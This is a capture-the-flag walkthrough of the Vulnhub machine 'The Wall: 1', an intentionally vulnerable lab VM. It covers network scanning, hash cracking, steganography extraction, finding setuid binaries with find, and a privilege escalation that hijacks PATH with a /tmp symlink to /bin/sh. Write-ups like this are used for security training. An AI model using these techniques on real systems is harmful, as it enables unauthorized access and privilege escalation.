[Vulnhub] the Wall: 1

“In 1965, one of the most influential bands of our times was formed.. Pink Floyd. This boot2root box has been created to celebrate 50 years of Pink Floyd’s contribution to the music industry, with each challenge giving the attacker an introduction to each member of the Floyd.

You challenge is simple… set your controls for the heart of the sun, get root, and grab the flag! Rock on!“ – Xerubus

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.130/24)

Target: The Wall: 1 (10.1.1.148/24)

Vulnerability & Exploit

  • hidden information reveal
  • Image steganography exploit
  • moss code decode
  • local priv escape by sticky bit

Method

  • Scanned the network to discover the target server [arp-scan]
  • Sniffing local LAN for any suspicious traffic [wireshark]
  • Multiple times port scan the target to discover running services and open ports [masscan && nmap]
  • Reveal hidden information from source codes and images [steghide]
  • Crack found hashes and login to SSH on target machine [hashcat]
  • Enumeration and exploit the vulnerable files which set the sticky bit to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using arp-scan as routine to detect the target’s IP address (10.1.1.148 in this case).

1
2
3
4
5
6
7
8
9
10
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:fd:d1:6b   VMware, Inc.
10.1.1.148    00:0c:29:31:6b:24   VMware, Inc.
10.1.1.254    00:50:56:f5:74:35   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 3.314 seconds (77.25 hosts/sec). 4 responded

10.1.1.148 is our Target!

Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

However, this time nothing has been found. It sounds like they are behind ‘the Wall’…:`(

Well, it is wierd for a machine with no ports open, so I decided to have a monitor on local LAN to see if the target machine has any suspicious network traffic.

Here it is! Looks like the target machine is looking for tcp port 1337, so I setup nc to listen on port 1337 and then got the following information:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@kali:~# nc -lvvnp 1337
listening on [any] 1337 ...
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.148] 43892

                       .u!"`
                   .x*"`
               ..+"NP
            .z""   ?
          M#`      9     ,     ,
                   9 M  d! ,8P'
                   R X.:x' R'  ,
                   F F' M  R.d'
                   d P  @  E`  ,
      ss           P  '  P  N.d'
       x         ''        '
       X               x             .
       9     .f       !         .    $b
       4;    $k      /         dH    $f
       'X   ;$$     z  .       MR   :$
        R   M$$,   :  d9b      M'   tM
        M:  #'$L  ;' M `8      X    MR
        `$;t' $F  # X ,oR      t    Q;
         $$@  R$ H :RP' $b     X    @'
         9$E  @Bd' $'   ?X     ;    W
         `M'  `$M d$    `E    ;.o* :R   ..
          `    '  "'     '    @'   '$o*"'   
   
              The Wall by @xerubus
          -= Welcome to the Machine =-

If you should go skating on the thin ice of modern life, dragging behind you the silent reproach of a million tear-stained eyes, don't be surprised when a crack in the ice appears under your feet. - Pink Floyd, The Thin Ice
 sent 0, rcvd 1066 : Connection reset by peer

However, the connection has been automatically closed as soon as we receive the above information. After being stuck for a while, I decided to re-run the ports scan again. Surprisingly, this time TCP port 80 open!

1
2
3
4
5
6
7
root@kali:~# masscan -p1-65535 10.1.1.148/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-12-06 04:55:02 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 80/tcp on 10.1.1.148

By checking the source code of web page, I found the interesting HEX strings at the bottom: 737465673d3333313135373330646262623337306663626539373230666536333265633035

1
2
3
4
5
6
7
8
9
10
11
12
13
<html>
<body bgcolor="#000000">
<center><img src="pink_floyd.jpg"</img></center>
</body>
</html>


<!--If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall  

Did you know? The Publius Enigma is a mystery surrounding the Division Bell album. Publius promised an unspecified reward for solving the 
riddle, and further claimed that there was an enigma hidden within the artwork.  

737465673d3333313135373330646262623337306663626539373230666536333265633035-->

After HEX decoding, we got steg=33115730dbbb370fcbe9720fe632ec05, the first thing in my mind when I saw the keyword steg is steganography, some information hidden in the image file. so far, the only image file downloaded from the web page is pink_floyd.jpg.

Then I firstly run steghide with password 33115730dbbb370fcbe9720fe632ec05 but could not extract anything… so I guess this is a MD5 hash, then I use hashcat with dictionary rockyou to crack it and found the password: divisionbell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
...truncate...
Added hashes from file stegkey.txt: 1 (1 salts)
Activating quick-digest mode for single-hash

NOTE: press enter for status-screen

33115730dbbb370fcbe9720fe632ec05:divisionbell         <-- here is the cracked password!

All hashes have been recovered

Input.Mode: Dict (/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3627099 (words), 33550339 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 31.00M words
Progress..: 2063664/3627099 (56.90%)
Running...: --:--:--:--
Estimated.: --:--:--:--

Started: Sun Dec  6 00:12:55 2015
Stopped: Sun Dec  6 00:13:08 2015

Then use the new cracked password to extract hidden information from the image file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:~/the_wall# steghide --extract -p divisionbell -sf pink_floyd.jpg
wrote extracted data to "pink_floyd_syd.txt".
root@kali:~/the_wall# cat pink_floyd_syd.txt
Hey Syd,

I hear you're full of dust and guitars?

If you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0

Roger

Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd.  The name was inspired
by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in
his collection.

root@kali:~/the_wall#

From the email file, we noticed that there is a key U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0, we can see there are two parts separated by |, first one is base64 encoded and the second one is a MD5 hash.

After cracked the string, we got the first part is SydBarrett and the second part is pinkfloydrocks. This must be a login credential, but the question is where to use it?!

Here I did couple of trails against to the web application but all failed (tried nikto, dirbuster and etc)… Then I guess there might be some new ports open just like what has happened on port 80, so I re-run the port scan once again.

Woooo, I am right! new port 1965 discovered by masscan!

1
2
3
4
5
6
7
8
root@kali:~# masscan -p1-65535 10.1.1.148/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-12-06 05:30:16 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 80/tcp on 10.1.1.148
Discovered open port 1965/tcp on 10.1.1.148

Then I run nmap to do a further scan for these two ports.

1
2
3
4
5
6
7
8
9
10
11
12
13
# Nmap 6.49BETA5 scan initiated Sun Dec  6 00:32:59 2015 as: nmap -v -sV -O -A -p80,1965 -oN 10.1.1.148_nmap.txt 10.1.1.148
Nmap scan report for 10.1.1.148
Host is up (0.00069s latency).
PORT     STATE SERVICE VERSION
80/tcp   open  http    OpenBSD httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 405)
|_http-server-header: OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).
1965/tcp open  ssh     OpenSSH 7.0 (protocol 2.0)
| ssh-hostkey:
|   2048 70:26:15:de:7b:29:9a:56:a3:eb:33:e0:7e:fb:92:d8 (RSA)
|_  256 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a (ECDSA)
... truncate ...

From the scanning result, we know that 1965 is running SSH.

Then go SSH login on port 1965 with SydBarrett as username and pinkfloydrocks as password, but… failed… which the reasons is This service allows sftp connections only.. T.T

1
2
3
4
5
6
7
8
9
root@kali:~/the_wall# ssh SydBarrett@10.1.1.148 -p1965
The authenticity of host '[10.1.1.148]:1965 ([10.1.1.148]:1965)' can't be established.
ECDSA key fingerprint is 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[10.1.1.148]:1965' (ECDSA) to the list of known hosts.
SydBarrett@10.1.1.148's password:
Could not chdir to home directory /home/SydBarrett: No such file or directory
This service allows sftp connections only.
Connection to 10.1.1.148 closed.

Ok, now I use sftp and try it again.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@kali:~/the_wall# sftp -P 1965 SydBarrett@10.1.1.148
SydBarrett@10.1.1.148's password:
Connected to 10.1.1.148.
sftp> ls -ahl
drwxr-x---    0 0        1000         512B Oct 24 16:16 .
drwxr-x---    0 0        1000         512B Oct 24 16:16 ..
drwxr-xr-x    0 0        1000         512B Oct 24 14:17 .mail
-rw-r--r--    0 0        1000         1.9K Oct 25 18:56 bio.txt
-rw-r--r--    0 0        1000         849K Oct 24 12:17 syd_barrett_profile_pic.jpg
sftp> ls -alh .mail
drwxr-xr-x    0 0        1000         512B Oct 24 14:17 .mail/.
drwxr-x---    0 0        1000         512B Oct 24 16:16 .mail/..
drwxr-xr-x    0 0        1000         512B Nov 11 05:25 .mail/.stash
-rw-r--r--    0 0        1000         309B Oct 24 14:18 .mail/sent-items
sftp> ls -alh .mail/.stash
drwxr-xr-x    0 0        1000         512B Nov 11 05:25 .mail/.stash/.
drwxr-xr-x    0 0        1000         512B Oct 24 14:17 .mail/.stash/..
-rw-r--r--    0 0        1000        46.6M Aug  7 10:33 .mail/.stash/eclipsed_by_the_moon
sftp>
sftp> get bio.txt
Fetching /bio.txt to bio.txt
/bio.txt                                                                                                                                                                   100% 1912     1.9KB/s   00:00
sftp> get syd_barrett_profile_pic.jpg
Fetching /syd_barrett_profile_pic.jpg to syd_barrett_profile_pic.jpg
/syd_barrett_profile_pic.jpg                                                                                                                                               100%  849KB 848.6KB/s   00:01
sftp> get .mail/sent-items
Fetching /.mail/sent-items to sent-items
/.mail/sent-items                                                                                                                                                          100%  309     0.3KB/s   00:00
sftp> get .mail/.stash/eclipsed_by_the_moon
Fetching /.mail/.stash/eclipsed_by_the_moon to eclipsed_by_the_moon
/.mail/.stash/eclipsed_by_the_moon                                                                                                                                         100%   47MB   7.8MB/s   00:06
sftp>

Good, let’s check the files one by one.

1
2
3
4
5
6
root@kali:~/the_wall# file eclipsed_by_the_moon
eclipsed_by_the_moon: gzip compressed data, last modified: Tue Nov 10 19:15:47 2015, from Unix
root@kali:~/the_wall# tar zxvf eclipsed_by_the_moon
eclipsed_by_the_moon.lsd
root@kali:~/the_wall# file eclipsed_by_the_moon.lsd
eclipsed_by_the_moon.lsd: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", sectors/cluster 2, reserved sectors 8, root entries 512, Media descriptor 0xf8, sectors/FAT 188, sectors/track 63, heads 255, hidden sectors 2048, sectors 96256 (volumes > 32 MB) , serial number 0x9e322180, unlabeled, FAT (16 bit)

There is nothing interesting in the frist three files but the last one eclipsed_by_the_moon which the size is 46.6M and it is a gz archive file.

After unzip the file, we got a FAT format system here. Then I use foremost to check and extract interesting files.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@kali:~/the_wall# foremost -v -i eclipsed_by_the_moon.lsd
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Sun Dec  6 00:57:34 2015
Invocation: foremost -v -i eclipsed_by_the_moon.lsd
Output directory: /root/the_wall/output
Configuration file: /etc/foremost.conf
Processing: eclipsed_by_the_moon.lsd
|------------------------------------------------------------------
File: eclipsed_by_the_moon.lsd
Start: Sun Dec  6 00:57:34 2015
Length: 47 MB (49283072 bytes)

Num    Name (bs=512)        Size  File Offset     Comment

0:    00000418.jpg         123 KB       214016  
*|
Finish: Sun Dec  6 00:57:35 2015

1 FILES EXTRACTED
  
jpg:= 1
------------------------------------------------------------------

Foremost finished at Sun Dec  6 00:57:35 2015

Here we got a JPG file extracted. Open it and this is Roger Waters! also his password: hello_is_there_anybody_in_there

From the previous username SydBarrett, we guess Roger’s username format should be the same, RogerWaters

With this username and password, we can finally get a non privileged SSH shell from the target server’s port 1965.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@kali:~/the_wall# ssh RogerWaters@10.1.1.148 -p 1965
RogerWaters@10.1.1.148's password: 
OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015

                       .u!"`
                   .x*"`
               ..+"NP
            .z""   ?
          M#`      9     ,     ,
                   9 M  d! ,8P'
                   R X.:x' R'  ,
                   F F' M  R.d'
                   d P  @  E`  ,
      ss           P  '  P  N.d'
       x         ''        '
       X               x             .
       9     .f       !         .    $b
       4;    $k      /         dH    $f
       'X   ;$$     z  .       MR   :$
        R   M$$,   :  d9b      M'   tM
        M:  #'$L  ;' M `8      X    MR
        `$;t' $F  # X ,oR      t    Q;
         $$@  R$ H :RP' $b     X    @'
         9$E  @Bd' $'   ?X     ;    W
         `M'  `$M d$    `E    ;.o* :R   ..
          `    '  "'     '    @'   '$o*"'
$ id
uid=1002(RogerWaters) gid=1002(RogerWaters) groups=1002(RogerWaters)
$ pwd
/home/RogerWaters
$ 

Now we are in, next step should be go upper to escape privilege.

After enumeration the file system, I found the following information.

1
2
3
4
5
6
7
8
9
$ ls -al /home
total 28
drwxr-xr-x   7 root           wheel          512 Oct 24 17:36 .
drwxr-xr-x  13 root           wheel          512 Oct 24 18:03 ..
drwx------   4 DavidGilmour   DavidGilmour   512 Oct 28 09:28 DavidGilmour
drwx------   3 NickMason      NickMason      512 Aug  8 00:33 NickMason
drwx------   3 RichardWright  RichardWright  512 Nov 27 02:02 RichardWright
drwx------   3 RogerWaters    RogerWaters    512 Oct 28 09:29 RogerWaters
drwxr-xr-x   4 root           SydBarrett     512 Oct 24 18:03 SydBarrett

Looks like there are 5 users in the system and we have already got 2, so more like we need to escape to others before get ROOT.

Then we try to find files which set the sticky bit under those three users, and we found:

1
2
3
4
5
6
7
8
$ find / -perm -u=s -type f -user DavidGilmour 2>/dev/null
/usr/local/bin/shineon
$ find / -perm -g=s -type f -user NickMason 2>/dev/null
/usr/local/bin/brick
$ ls -al /usr/local/bin/shineon
-rwsr-s---  1 DavidGilmour  RichardWright  7524 Oct 25 07:58 /usr/local/bin/shineon
$ ls -al /usr/local/bin/brick
-rws--s--x  1 NickMason  NickMason  7291 Aug  8 00:33 /usr/local/bin/brick

Cool!! Any one can run the file /usr/local/bin/brick and it has sticky bit set!

Run it and give the correct answer (which should not be a problem if you familiar with Pink Floyd), so I am now Nick Mason!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ /usr/local/bin/brick




What have we here, laddie?
Mysterious scribbings?
A secret code?
Oh, poems, no less!
Poems everybody!




Who is the only band member to be featured on every Pink Floyd album? : Nick Mason
/bin/sh: Cannot determine current working directory
$ id
uid=1001(NickMason) gid=1001(NickMason) groups=1002(RogerWaters)
$ whoami
NickMason
$ 

By checking NickMason’s home folder, nothing interesting but another jpg file, I downloaded it to my Kali and try to open it but it is not a JPEG file… it is an Ogg audio file!

1
2
3
4
5
root@kali:~/the_wall# display nick_mason_profile_pic.jpg
display: Not a JPEG file: starts with 0x4f 0x67 `nick_mason_profile_pic.jpg' @ error/jpeg.c/JPEGErrorHandler/322.
root@kali:~/the_wall# file nick_mason_profile_pic.jpg
nick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, ~160000 bps, created by: Xiph.Org libVorbis I
root@kali:~/the_wall#

Open and listen it carefully, there is moss code playing in the background. after run some audio analyze tools to curve the morse code out (more details please check Arr0way’s walkthrough):

.-. .. -.-. .... .- .-. -.. .-- .-. .. --. .... - .---- ----. ....- ...-- ..-. .- .-. ..-. .. ... .-

Crack the morse code online and we got the plaintext which is RICHARDWRIGHT1943FARFISA. So now we got a new login credential: username is RichardWright and password is 1943farfisa.

Right, now I can su to Richard successfully!

1
2
3
4
5
6
7
$ su RichardWright
Password:
ksh: Cannot determine current working directory
$ id
uid=1003(RichardWright) gid=1003(RichardWright) groups=1003(RichardWright)
$ whoami
RichardWright

Now let’s back to the other sticky file /usr/local/bin/shineon which is can be run by RichardWright

1
2
$ ls -al /usr/local/bin/shineon
-rwsr-s---  1 DavidGilmour  RichardWright  7524 Oct 25 07:58 /usr/local/bin/shineon

After run the program, we know that it call system commands such as ping and mail etc… Let’s check if there is basic coding error we can exploit to priv escape.

Run strings to check the binary file and found it call the command mail without specifying the absolute path.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
Quitting program!
Invalid choice!
load_menu
Time - The Dark Side of the Moon
/usr/bin/cal
Press ENTER to continue.
Echoes - Meddle
/usr/bin/who
Is There Anybody Out There? - The Wall
/sbin/ping -c 3 www.google.com
Keep Talking- The Division Bell
mail

Now, It’s time to move to David!

First, create a symbolic link of /bin/sh to the global writable directory /tmp and name it as mail, then overriding the environment variable $PATH.

1
2
$ ln -s /bin/sh /tmp/mail
$ export PATH=/tmp:$PATH

Then run /usr/local/bin/shineon and choose number 4 to call our fake mail, then we got a shell with DavidGilmour priviledge.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
$ /usr/local/bin/shineon
Menu

1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
4
Keep Talking- The Division Bell
mail: Cannot determine current working directory
$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)
$ pwd
mail: pwd: can't get current directory - Permission denied
$ whoami
DavidGilmour
$ cd /home/DavidGilmour
$ ls -alh
total 408
drwx------  4 DavidGilmour  DavidGilmour   512B Oct 28 09:28 .
drwxr-xr-x  7 root          wheel          512B Oct 24 17:36 ..
-rw-r--r--  1 DavidGilmour  DavidGilmour    87B Oct 24 17:36 .Xdefaults
-rw-r--r--  1 DavidGilmour  DavidGilmour   773B Oct 24 17:36 .cshrc
-rw-r--r--  1 DavidGilmour  DavidGilmour   103B Oct 24 17:36 .cvsrc
-rw-r--r--  1 DavidGilmour  DavidGilmour   398B Oct 24 17:36 .login
-rw-r--r--  1 DavidGilmour  DavidGilmour   175B Oct 24 17:36 .mailrc
drwx------  2 DavidGilmour  DavidGilmour   512B Oct 26 11:44 .private
-rw-r--r--  1 DavidGilmour  DavidGilmour   218B Oct 24 17:36 .profile
drwx------  2 DavidGilmour  DavidGilmour   512B Oct 28 05:16 .ssh
-rw-------  1 DavidGilmour  DavidGilmour   384B Aug  8 00:33 anotherbrick.txt
-rw-r--r--  1 DavidGilmour  DavidGilmour  1022B Oct 26 08:59 bio.txt
-rwxr-----  1 DavidGilmour  DavidGilmour   178K Oct 28 08:50 david_gilmour_profile_pic.jpg
-rw-r--r--  1 DavidGilmour  DavidGilmour   785B Oct 27 01:43 mbox

In order to get full priviledge of use DavidGilmour, I did some enumeration and there is a jpg file in David’s home directory. By checking the jpg file david_gilmour_profile_pic.jpg with strings, I found the password on the bottom: who_are_you_and_who_am_i.

Now, login to David with his password.

1
2
3
4
5
6
login: DavidGilmour
Password:
$ id
uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine)
$ whoami
DavidGilmour

After some enumeration, I found new clues in the file anotherbrick.txt

1
2
3
4
5
6
7
$ cat anotherbrick.txt
# Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine. - Pink Floyd, Shine On You Crazy Diamond

New website for review:    pinkfloyd1965newblogsite50yearscelebration-temp/index.php

# You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in. - Pink Floyd, Dogs 
$ 

Checking the new web page, this is the home page of 50 years of Pink Floyd.

After some testing with the new web page, could not find any attacking point, so I downloaded the picture and have a close look.

There are something hidden in it, by increasing the brightness of the picture, the hidden strings become more and more clearly.

From the picture, we got a folder or a path /welcometothemachine and a key 50696e6b466c6f796435305965617273.

By searching the keyword welcometothemachine, I found a sticky file which is owned by root!

1
2
3
4
5
6
7
8
$ find / -name 'welcometothemachine' 2>/dev/null
/var/www/htdocs/welcometothemachine
$ ls -al /var/www/htdocs/welcometothemachine
total 24
drwxr-xr-x  2 root  welcometothemachine   512 Aug  8 00:33 .
drwxr-x---  4 www   welcometothemachine   512 Nov 27 01:47 ..
-rws--s---  1 root  welcometothemachine  7513 Nov 27 01:47 PinkFloyd
$ 

After run the file PinkFloyd and input the answer 50696e6b466c6f796435305965617273

1
2
3
4
5
6
7
8
9
$ /var/www/htdocs/welcometothemachine/PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: 50696e6b466c6f796435305965617273

Fearlessly the idiot faced the crowd smiling. - Pink Floyd, Fearless

Congratulations... permission has been granted.
You can now set your controls to the heart of the sun!
$ 

Notice the sentence: Congratulations... permission has been granted. by checking the sudo file, we are now can run any command as any users including ROOT!

1
2
3
4
5
6
7
$ sudo -l
Password:
Matching Defaults entries for DavidGilmour on thewall:
    env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"

User DavidGilmour may run the following commands on thewall:
    (ALL) SETENV: ALL

Now catch the Flag!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
$ sudo ls -al /root
total 48
drwx------   5 root  wheel   512 Nov 27 02:04 .
drwxr-xr-x  13 root  wheel   512 Oct 24 18:03 ..
-rw-r--r--   1 root  wheel    87 Aug 16 18:25 .Xdefaults
-rw-r--r--   1 root  wheel   578 Aug 16 18:25 .cshrc
-rw-r--r--   1 root  wheel    94 Aug 16 18:25 .cvsrc
-rw-r--r--   1 root  wheel   328 Aug 16 18:25 .login
-rw-r--r--   1 root  wheel   468 Aug 16 18:25 .profile
drwx------   2 root  wheel   512 Nov 27 05:01 .ssh
-rw-r--r--   1 root  wheel  2739 Nov 27 01:07 flag.txt
drwxr-xr-x   2 root  wheel   512 Nov 14 02:43 scripts
drwxr-xr-x   2 root  wheel   512 Oct 27 03:10 tmp
$ sudo cat /root/flag.txt

"The band is fantastic, that is really what I think. Oh, by the way, which one is Pink? - Pink Floyd, Have A Cigar"

                   Congratulations on rooting thewall!

   ___________________________________________________________________
  | |       |       |       |       |       |       |       |       | |
  |_|_______|_______|______ '__  ___|_______|_______|_______|_______|_|
  |     |       |       |   |  )      /         |       |       |     |
  |_____|_______|_______|__ |,' , .  | | _ , ___|_______|_______|_____|
  | |       |       |      ,|   | |\ | | ,' |       |       |       | |
  |_|_______|_______|____ ' | _ | | \| |'\ _|_______|_______|_______|_|
  |     |       |       |   \  _' '  ` |  \     |       |       |     |
  |_____|_______|_______|_  ,-'_ _____ | _______|_______|_______|_____|
  | |       |       |   ,-'|  _     |       |       |       |       | |
  |_|_______|_______|__  ,-|-' |  ,-. \ /_.--. _____|_______|_______|_|
  |     |       |          |   |  | |  V  |   ) |       |       |     |
  |_____|_______|_______|_ | _ |-'`-'  |  | ,' _|_______|_______|_____|
  | |       |       |      |        |  '  ;'        |       |       | |
  |_|_______|_______|______"|_____  _,- o'__|_______|_______|_______|_|
  |     |       |       |       _,-'    .       |       |       |     |
  |_____|_______|_______|_ _,--'\      _,-'_____|_______|_______|_____|
  | |       |       |     '     ||_||-' _   |       |       |       | |
  |_|_______|_______|_______|__ || ||,-'  __|_______|_______|_______|_|
  |     |       |       |       |  ||_,-'       |       |       |     |
  |_____|_______|______.|_______.__  ___|_______|_______|_______|_____|
  | |       |       |   \    |     /        |       |       |       | |
  |_|_______|_______|___ \ __|___ /,  _ |   | ______|_______|_______|_|
  |     |       |       | \      // \   |   |   |       |       |     |
  |_____|_______|_______|_ \ /\ //--'\  |   | __|_______|_______|_____|
  | |       |       |       '  V/    |  |-' |__,    |       |       | |
  |_|_______|_______|_______|_______ _______'_______|_______|_______|_|
  |     |       |       |       |       |       |       |       |     |
  |_____|_______|_______|_______|_______|_______|_______|_______|_____|
  |_________|_______|_______|_______|_______|_______|_______|_______|_|

                  Celebrating 50 years of Pink Floyd!
             Syd Barrett (RIP), Nick Mason, Roger Waters,
               Richard Wright (RIP), and David Gilmour.


** Shoutouts **
+ @vulnhub for making it all possible
+ @rastamouse @thecolonial - "the test bunnies"

-=========================================-
-  xerubus (@xerubus - www.mogozobo.com)  -
-=========================================-

Cheers to Xerubus, really funny and enjoyable challenge with tons of knowledge. Greate job!!

2015-12-07 23:13:16 -0500